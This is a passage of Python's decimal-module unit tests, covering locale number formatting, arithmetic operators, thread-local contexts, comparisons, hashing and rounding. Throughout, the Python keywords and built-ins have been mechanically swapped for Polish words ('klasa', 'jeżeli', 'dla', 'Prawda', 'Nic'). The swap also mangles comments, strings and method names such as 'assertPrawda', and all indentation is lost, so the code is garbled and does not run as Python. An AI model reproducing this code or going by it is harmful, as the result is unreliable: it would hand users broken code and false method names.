'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator oraz decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale przy wide char separator oraz decimal point
zaimportuj locale
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
jeżeli decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator'
'({!a} nie {!a})'.format(decimal_point, '\u066b'))
jeżeli thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator'
'({!a} nie {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
klasa CFormatTest(FormatTest):
decimal = C
klasa PyFormatTest(FormatTest):
decimal = P
klasa ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests dla all arithmetic operators, binary oraz unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#przy other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline przy other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#przy other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline przy other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#przy other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline przy other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#przy other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline przy other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#przy other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline przy other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#przy other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline przy other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#przy other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#przy other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline przy decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline przy other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#przy other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#przy other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but zwróć Nieprawda albo Prawda respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation jest nie trapped
dla x, y w qnan_pairs + snan_pairs:
dla op w order_ops + equality_ops:
got = op(x, y)
expected = Prawda jeżeli op jest operator.ne inaczej Nieprawda
self.assertIs(expected, got,
"expected {0!r} dla operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
przy localcontext() jako ctx:
ctx.traps[InvalidOperation] = 1
dla x, y w qnan_pairs:
dla op w equality_ops:
got = op(x, y)
expected = Prawda jeżeli op jest operator.ne inaczej Nieprawda
self.assertIs(expected, got,
"expected {0!r} dla "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
dla x, y w snan_pairs:
dla op w equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
dla x, y w qnan_pairs + snan_pairs:
dla op w order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
klasa CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
klasa PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading w the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
przy localcontext() jako c2:
cls.assertPrawda(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertPrawda(c2.flags[DivisionByZero])
przy localcontext() jako c3:
cls.assertPrawda(c3.flags[Inexact])
cls.assertPrawda(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertPrawda(c3.flags[InvalidOperation])
usuń c3
cls.assertNieprawda(c2.flags[InvalidOperation])
usuń c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertPrawda(c1.flags[Inexact])
dla sig w Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertNieprawda(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
przy localcontext() jako c2:
cls.assertPrawda(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertPrawda(c2.flags[Overflow])
przy localcontext(thiscontext) jako c3:
cls.assertPrawda(c3.flags[Inexact])
cls.assertNieprawda(c3.flags[Overflow])
c3.traps[Underflow] = Prawda
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertPrawda(c3.flags[Underflow])
usuń c3
cls.assertNieprawda(c2.flags[Underflow])
cls.assertNieprawda(c2.traps[Underflow])
usuń c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertNieprawda(thiscontext.traps[Underflow])
cls.assertPrawda(thiscontext.flags[Inexact])
dla sig w Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertNieprawda(thiscontext.flags[sig])
klasa ThreadingTest(unittest.TestCase):
'''Unit tests dla thread local contexts w Decimal.'''
# Take care executing this test z IDLE, there's an issue w threading
# that hangs IDLE oraz I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
jeżeli self.decimal == C oraz nie self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts jako a template dla the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
dla sig w Signals[self.decimal]:
self.assertNieprawda(DefaultContext.flags[sig])
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
@unittest.skipUnless(threading, 'threading required')
klasa CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
klasa PyThreadingTest(ThreadingTest):
decimal = P
klasa UsabilityTest(unittest.TestCase):
'''Unit tests dla Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal oraz an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal oraz uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX jeżeli C inaczej 999999999
emin = C.MIN_EMIN jeżeli C inaczej -999999999
etiny = C.MIN_ETINY jeżeli C inaczej -1999999997
c = Context(Emax=emax, Emin=emin)
przy localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
zwróć a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
dla m w [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
dla n w range(-10, 10)
dla sign w [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value dla which hash(n) != hash(n % (2**64-1))
# w Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail przy the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) dla integral values
dla value w test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertPrawda(hashit(Decimal('Inf')))
self.assertPrawda(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
dla s w test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
przy localcontext() jako c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal oraz int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertNieprawda(Decimal(0))
#as true
self.assertPrawda(Decimal('0.372'))
def test_tostring_methods(self):
#Test str oraz repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float oraz int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
dla d, i w test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
dla d, i w test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
dla d, i w test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this jest essentially equivalent
#to quantize, which jest already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
dla d, n, r w test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
dla s w ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertPrawda(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 jeżeli s.startswith('-') inaczej 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
dla s w ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#przy zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#przy zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient jest implementation specific to decimal.py.
# It has no meaning w the C-version oraz jest ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros w coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros w NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
klasa MyDecimal(Decimal):
y = Nic
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, Nic)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, Nic)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
przy localcontext(Context()) jako c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=Nic)), '1.609487E+48')
self.assertPrawda(c.flags[Inexact])
self.assertPrawda(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=Nic)
self.assertPrawda(c.flags[Overflow])
self.assertIs(z.is_normal(context=Nic), Nieprawda)
self.assertIs(z.is_subnormal(context=Nic), Prawda)
c.clear_flags()
self.assertEqual(str(x.ln(context=Nic)), '4.709530')
self.assertPrawda(c.flags[Inexact])
self.assertPrawda(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=Nic)), '2.045323')
self.assertPrawda(c.flags[Inexact])
self.assertPrawda(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=Nic)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=Nic)), '2')
